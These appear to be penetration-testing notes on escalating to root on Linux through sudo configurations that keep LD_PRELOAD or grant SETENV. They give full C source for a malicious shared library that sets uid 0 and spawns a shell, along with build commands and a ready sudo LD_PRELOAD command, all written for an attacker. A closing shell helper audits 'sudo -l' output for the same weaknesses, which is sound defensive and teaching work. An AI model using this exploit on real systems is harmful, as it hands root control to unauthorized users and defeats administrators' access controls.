LD_PRELOAD / SETENV

There are a couple of different ways I have found this to work:

1. If the output of sudo -l contains the area marked in the image below, you should be good to go.

2. If you run sudo -l and see SETENV under sudo permissions then I would also try this. Note: I had a file path after SETENV when this worked. I have not tried it with a bin, so I can't verify if it works the same.

  1. On the attacker machine, create a file called shell.c with the following code.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>     /* setgid(), setuid() */

/* Runs as soon as the library is loaded via LD_PRELOAD; the library is
   built with -nostartfiles so this _init replaces the default one. */
void _init(void) {
        unsetenv("LD_PRELOAD"); /* stop the child shell re-loading this library */
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

  2. Build shell.c into a shared object, shell.so:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

  3. Transfer the shell.so file to the target machine.

  4. Run the command below to get a root shell. Replace /usr/bin/ping with the path shown in the output of sudo -l.

sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
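As an added helper (not part of the original notes), a small POSIX sh function that reads saved `sudo -l` output and flags the two conditions above: a Defaults entry that keeps LD_PRELOAD via env_keep, which is what makes step 1 work, and a rule carrying the SETENV tag. The sample `sudo -l` text and the user name "alice" are constructed.

```shell
#!/bin/sh
# Added audit helper, not part of the original notes. Reads the text of
# `sudo -l` on stdin and flags the two conditions the notes rely on:
#   - a Defaults entry that keeps LD_PRELOAD across sudo (env_keep)
#   - a rule carrying the SETENV tag (NOSETENV is explicitly ignored)
# Returns 0 when neither is present, 1 when at least one is.
audit_sudo_l() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            *env_keep*LD_PRELOAD*)
                printf 'RISK env_keep preserves LD_PRELOAD: %s\n' "$line"
                found=1 ;;
            *NOSETENV:*)
                ;;   # "NOSETENV:" also contains "SETENV:", so test it first
            *SETENV:*)
                printf 'RISK SETENV tag on rule: %s\n' "$line"
                found=1 ;;
        esac
    done
    return $found
}

# Constructed sample of `sudo -l` output for a user "alice" (not real data).
SAMPLE='Matching Defaults entries for alice on host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host:
    (root) SETENV: /usr/bin/ping
    (root) NOPASSWD: /usr/bin/systemctl status'

# Usage: printf '%s\n' "$SAMPLE" | audit_sudo_l     (or: sudo -l | audit_sudo_l)
```

On the sample above it reports two RISK lines and returns 1; on output with only NOSETENV/NOPASSWD rules and no env_keep entry it prints nothing and returns 0.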
